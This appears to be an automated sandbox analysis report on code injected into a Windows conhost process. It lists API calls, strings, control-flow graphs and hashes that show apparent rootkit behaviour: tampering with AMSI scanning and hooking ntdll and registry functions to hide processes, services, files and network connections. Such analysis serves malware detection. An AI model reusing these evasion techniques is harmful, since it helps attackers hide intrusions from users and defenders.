13f08e6fa03 18676->18681 18683 13f08e6fab3 18676->18683 18678->18674 18679 13f08e6f949 18678->18679 18691 13f08e6f904 18678->18691 18684 13f08e6d1f4 __std_exception_copy 13 API calls 18679->18684 18680->18681 18689 13f08e6cab0 _invalid_parameter_noinfo 14 API calls 18680->18689 18690 13f08e6fa61 18681->18690 18696 13f08e6c5ac LeaveCriticalSection 18681->18696 18682 13f08e6fac0 18683->18682 18697 13f08e6c5ac LeaveCriticalSection 18683->18697 18687 13f08e6f94e 18684->18687 18688 13f08e6d04c _invalid_parameter_noinfo 38 API calls 18687->18688 18688->18691 18692 13f08e6f9f3 18689->18692 18694 13f08e6cab0 14 API calls _invalid_parameter_noinfo 18690->18694 18693 13f08e6cab0 _invalid_parameter_noinfo 14 API calls 18692->18693 18693->18681 18694->18690 18709 13f08e7387c 18710 13f08e738b4 __GSHandlerCheckCommon 18709->18710 18711 13f08e738e0 18710->18711 18713 13f08e69a24 18710->18713 18714 13f08e69324 __CxxCallCatchBlock 9 API calls 18713->18714 18715 13f08e69a4e 18714->18715 18716 13f08e69324 __CxxCallCatchBlock 9 API calls 18715->18716 18717 13f08e69a5b 18716->18717 18718 13f08e69324 __CxxCallCatchBlock 9 API calls 18717->18718 18719 13f08e69a64 18718->18719 18719->18711

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
        • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
        • API String ID: 2135414181-3414887735
        • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
        • Instruction ID: 54fa3f74439ef84f798580198d0fc9ab576eb874d6da8e014582fcc5289e2ace
        • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
        • Instruction Fuzzy Hash: 80712C36B10B50C5EB249FA9E8506D83B66FB85B88F401129FE4D53B2ADF3CC656C341

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
        • API String ID: 1735320900-4225371247
        • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
        • Instruction ID: 8d7d6d820c09092ffa059a0511e24e462b8f8990bfdf158d28218ca472cde877
        • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
        • Instruction Fuzzy Hash: 905168B0D10A4AA5FA2CEBECEC407D82B26A744385F90453AF509525679E7C836BC387

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
        • API String ID: 1735320900-4225371247
        • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
        • Instruction ID: 4794130181559e449b3fbcc2a45ca74c0d3afa12d0cceb7f8bee680c5db1c8ed
        • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
        • Instruction Fuzzy Hash: C051BAB0910A8AB1EB0CEBECEC507D57B22A700B54F90043BF959125679EBC974BC786

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 117 13f08e61e3c-13f08e61e60 LoadLibraryA GetProcAddress 118 13f08e61e62-13f08e61e6d SleepEx 117->118 119 13f08e61e6f-13f08e61e73 117->119 118->118
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: AddressLibraryLoadProcSleep
        • String ID: AmsiScanBuffer$amsi.dll
        • API String ID: 188063004-3248079830
        • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
        • Instruction ID: 82c22e2fcad5c222025ea9566ac2e4395cb35aaaa951655e601bb812e10937d1
        • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
        • Instruction Fuzzy Hash: 3DD06730E11A00D5FA2DAB99EC543D43A63AB64B81FD4043DE50E012A2DE2C875BC342

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 120 13f08e91e3c-13f08e91e60 LoadLibraryA GetProcAddress 121 13f08e91e6f-13f08e91e73 120->121 122 13f08e91e62-13f08e91e6d SleepEx 120->122 122->122
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: AddressLibraryLoadProcSleep
        • String ID: AmsiScanBuffer$amsi.dll
        • API String ID: 188063004-3248079830
        • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
        • Instruction ID: 653f5d351c32d8cadf4ad2790a01520cc49c821dda2f5a013474e3e164ef87e6
        • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
        • Instruction Fuzzy Hash: D5D06230E11641E5F90C6BDDDC943E57A636B64F41FD4043DE50A012A2DE6C575BC342

        Control-flow Graph

        APIs
        • GetModuleFileNameW.KERNEL32 ref: 0000013F08E63A35
        • PathFindFileNameW.SHLWAPI ref: 0000013F08E63A44
          • Part of subcall function 0000013F08E63F88: StrCmpNIW.SHLWAPI(?,?,?,0000013F08E6272F), ref: 0000013F08E63FA0
          • Part of subcall function 0000013F08E63EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63EDB
          • Part of subcall function 0000013F08E63EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63F0E
          • Part of subcall function 0000013F08E63EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63F2E
          • Part of subcall function 0000013F08E63EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63F47
          • Part of subcall function 0000013F08E63EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E63A5B), ref: 0000013F08E63F68
        • CreateThread.KERNELBASE ref: 0000013F08E63A8B
          • Part of subcall function 0000013F08E61E74: GetCurrentThread.KERNEL32 ref: 0000013F08E61E7F
          • Part of subcall function 0000013F08E61E74: CreateThread.KERNELBASE ref: 0000013F08E62043
          • Part of subcall function 0000013F08E61E74: TlsAlloc.KERNEL32 ref: 0000013F08E62049
          • Part of subcall function 0000013F08E61E74: TlsAlloc.KERNEL32 ref: 0000013F08E62055
          • Part of subcall function 0000013F08E61E74: TlsAlloc.KERNEL32 ref: 0000013F08E62061
          • Part of subcall function 0000013F08E61E74: TlsAlloc.KERNEL32 ref: 0000013F08E6206D
          • Part of subcall function 0000013F08E61E74: TlsAlloc.KERNEL32 ref: 0000013F08E62079
          • Part of subcall function 0000013F08E61E74: TlsAlloc.KERNEL32 ref: 0000013F08E62085
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
        • String ID:
        • API String ID: 2779030803-0
        • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
        • Instruction ID: 0f85b32534f0a75d91748e2590cd634ccffd720dcef4fe9d5be28feabdf609f3
        • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
        • Instruction Fuzzy Hash: D2112931E2460192FB6CA7E9E9493ED2AA3A7543C5F90413DF406816D3EF7CC7679602

        Control-flow Graph

        APIs
        • GetModuleFileNameW.KERNEL32 ref: 0000013F08E93A35
        • PathFindFileNameW.SHLWAPI ref: 0000013F08E93A44
          • Part of subcall function 0000013F08E93F88: StrCmpNIW.SHLWAPI(?,?,?,0000013F08E9272F), ref: 0000013F08E93FA0
          • Part of subcall function 0000013F08E93EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93EDB
          • Part of subcall function 0000013F08E93EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93F0E
          • Part of subcall function 0000013F08E93EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93F2E
          • Part of subcall function 0000013F08E93EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93F47
          • Part of subcall function 0000013F08E93EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E93A5B), ref: 0000013F08E93F68
        • CreateThread.KERNELBASE ref: 0000013F08E93A8B
          • Part of subcall function 0000013F08E91E74: GetCurrentThread.KERNEL32 ref: 0000013F08E91E7F
          • Part of subcall function 0000013F08E91E74: CreateThread.KERNELBASE ref: 0000013F08E92043
          • Part of subcall function 0000013F08E91E74: TlsAlloc.KERNEL32 ref: 0000013F08E92049
          • Part of subcall function 0000013F08E91E74: TlsAlloc.KERNEL32 ref: 0000013F08E92055
          • Part of subcall function 0000013F08E91E74: TlsAlloc.KERNEL32 ref: 0000013F08E92061
          • Part of subcall function 0000013F08E91E74: TlsAlloc.KERNEL32 ref: 0000013F08E9206D
          • Part of subcall function 0000013F08E91E74: TlsAlloc.KERNEL32 ref: 0000013F08E92079
          • Part of subcall function 0000013F08E91E74: TlsAlloc.KERNEL32 ref: 0000013F08E92085
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
        • String ID:
        • API String ID: 2779030803-0
        • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
        • Instruction ID: a54b729f4e76a0ffdd6e9ad0e607cc6e37a7dfe0aa61ea1ff0e55a31d28b59d9
        • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
        • Instruction Fuzzy Hash: D4116135E10681A2F76C97ECA9453D96A93A754765F50103DFC86812D3DFFCC7468602
        APIs
        Memory Dump Source
        • Source File: 00000013.00000003.2617755503.0000013F081C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000013F081C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_3_13f081c0000_conhost.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
        • Instruction ID: 9499d148463b0eecc480ed2ad07d584ad4d26eb85b58bf1e9a151cbbf816f1ce
        • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
        • Instruction Fuzzy Hash: 4291F672F116508BDB588F29D4007ADBB92FF54B98FA4C138EE6947789DA34D913C710

        Control-flow Graph

        APIs
          • Part of subcall function 0000013F08E61724: GetProcessHeap.KERNEL32 ref: 0000013F08E6172F
          • Part of subcall function 0000013F08E61724: HeapAlloc.KERNEL32 ref: 0000013F08E6173E
          • Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E617AE
          • Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E617DB
          • Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E617F5
          • Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E61815
          • Part of subcall function 0000013F08E61724: RegCloseKey.KERNELBASE ref: 0000013F08E61830
          • Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E61850
          • Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E6186B
          • Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E6188B
          • Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E618A6
          • Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E618C6
        • SleepEx.KERNELBASE ref: 0000013F08E61BDF
          • Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E618E1
          • Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E61901
          • Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E6191C
          • Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E6193C
          • Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E61957
          • Part of subcall function 0000013F08E61724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E61977
          • Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E61992
          • Part of subcall function 0000013F08E61724: RegCloseKey.ADVAPI32 ref: 0000013F08E6199C
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: CloseOpen$Heap$AllocProcessSleep
        • String ID:
        • API String ID: 948135145-0
        • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
        • Instruction ID: 05d309dc4b1016f937ccac57fb3bef7129eb2162d3918dfb3cc06758192d337f
        • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
        • Instruction Fuzzy Hash: 5B313075A0064191FB5E9BAFD5503ED7BA6AB44BC0F044839FE0987297DE1CCA73820B

        Control-flow Graph

        APIs
          • Part of subcall function 0000013F08E91724: GetProcessHeap.KERNEL32 ref: 0000013F08E9172F
          • Part of subcall function 0000013F08E91724: HeapAlloc.KERNEL32 ref: 0000013F08E9173E
          • Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E917AE
          • Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E917DB
          • Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E917F5
          • Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E91815
          • Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E91830
          • Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E91850
          • Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E9186B
          • Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E9188B
          • Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E918A6
          • Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E918C6
        • SleepEx.KERNELBASE ref: 0000013F08E91BDF
          • Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E918E1
          • Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E91901
          • Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E9191C
          • Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E9193C
          • Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E91957
          • Part of subcall function 0000013F08E91724: RegOpenKeyExW.ADVAPI32 ref: 0000013F08E91977
          • Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E91992
          • Part of subcall function 0000013F08E91724: RegCloseKey.ADVAPI32 ref: 0000013F08E9199C
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: CloseOpen$Heap$AllocProcessSleep
        • String ID:
        • API String ID: 948135145-0
        • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
        • Instruction ID: 681476998691bf9496b3bf02fb01726263ff9e368a159aaf3cb5bf1ccd39cabc
        • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
        • Instruction Fuzzy Hash: 13317875A0068391FB5C9BAED5413E93BA7A744BC0F140439FE8983397DE9CCA52820F

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 394 13f08e62ff0-13f08e63069 396 13f08e63384-13f08e633a7 394->396 397 13f08e6306f-13f08e63075 394->397 397->396 398 13f08e6307b-13f08e6307e 397->398 398->396 399 13f08e63084-13f08e63087 398->399 399->396 400 13f08e6308d-13f08e6309d GetModuleHandleA 399->400 401 13f08e630b1 400->401 402 13f08e6309f-13f08e630af GetProcAddress 400->402 403 13f08e630b4-13f08e630d2 401->403 402->403 403->396 405 13f08e630d8-13f08e630f7 StrCmpNIW 403->405 405->396 406 13f08e630fd-13f08e63101 405->406 406->396 407 13f08e63107-13f08e63111 406->407 407->396 408 13f08e63117-13f08e6311e 407->408 408->396 409 13f08e63124-13f08e63137 408->409 410 13f08e63139-13f08e63145 409->410 411 13f08e63147 409->411 412 13f08e6314a-13f08e6314e 410->412 411->412 413 13f08e63150-13f08e6315c 412->413 414 13f08e6315e 412->414 415 13f08e63161-13f08e6316b 413->415 414->415 416 13f08e63251-13f08e63255 415->416 417 13f08e63171-13f08e63174 415->417 420 13f08e63376-13f08e6337e 416->420 421 13f08e6325b-13f08e6325e 416->421 418 13f08e63186-13f08e63190 417->418 419 13f08e63176-13f08e63183 call 13f08e61a30 417->419 425 13f08e631c4-13f08e631ce 418->425 426 13f08e63192-13f08e6319f 418->426 419->418 420->396 420->409 422 13f08e6326f-13f08e63279 421->422 423 13f08e63260-13f08e6326c call 13f08e61a30 421->423 428 13f08e6327b-13f08e63288 422->428 429 13f08e632a9-13f08e632ac 422->429 423->422 432 13f08e631d0-13f08e631dd 425->432 433 13f08e631fe-13f08e63201 425->433 426->425 431 13f08e631a1-13f08e631ae 426->431 428->429 437 13f08e6328a-13f08e63297 428->437 438 13f08e632ae-13f08e632b7 call 13f08e61cc4 429->438 439 13f08e632b9-13f08e632c6 lstrlenW 429->439 440 13f08e631b1-13f08e631b7 431->440 432->433 441 13f08e631df-13f08e631ec 432->441 435 13f08e63203-13f08e6320d call 13f08e61cc4 433->435 436 13f08e6320f-13f08e6321c lstrlenW 433->436 435->436 449 13f08e63247-13f08e6324c 435->449 445 13f08e6322f-13f08e63241 call 13f08e63f88 436->445 446 13f08e6321e-13f08e6322d call 13f08e61cfc 436->446 444 13f08e6329a-13f08e632a0 437->444 438->439 456 13f08e632ee-13f08e632f9 438->456 450 13f08e632d9-13f08e632e3 call 13f08e63f88 439->450 451 13f08e632c8-13f08e632d7 call 13f08e61cfc 439->451 448 13f08e631bd-13f08e631c2 440->448 440->449 442 13f08e631ef-13f08e631f5 441->442 442->449 452 13f08e631f7-13f08e631fc 442->452 455 13f08e632a2-13f08e632a7 444->455 444->456 445->449 460 13f08e632e6-13f08e632e8 445->460 446->445 446->449 448->425 448->440 449->460 450->460 451->450 451->456 452->433 452->442 455->429 455->444 463 13f08e63370-13f08e63374 456->463 464 13f08e632fb-13f08e632ff 456->464 460->420 460->456 463->420 468 13f08e63301-13f08e63305 464->468 469 13f08e63307-13f08e63321 call 13f08e73a40 464->469 468->469 470 13f08e63324-13f08e63327 468->470 469->470 473 13f08e63329-13f08e63347 call 13f08e73a40 470->473 474 13f08e6334a-13f08e6334d 470->474 473->474 474->463 476 13f08e6334f-13f08e6336d call 13f08e73a40 474->476 476->463
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
        • API String ID: 2119608203-3850299575
        • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction ID: e8e303e550958ede0072480a2d70954000bcae72d0950bddabd175a538577739
        • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction Fuzzy Hash: E1B18C32A1069082EB6D8FA9D4007D9ABA6F744BD4F44502EFE1953B96DF39CE62C341
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
        • API String ID: 2119608203-3850299575
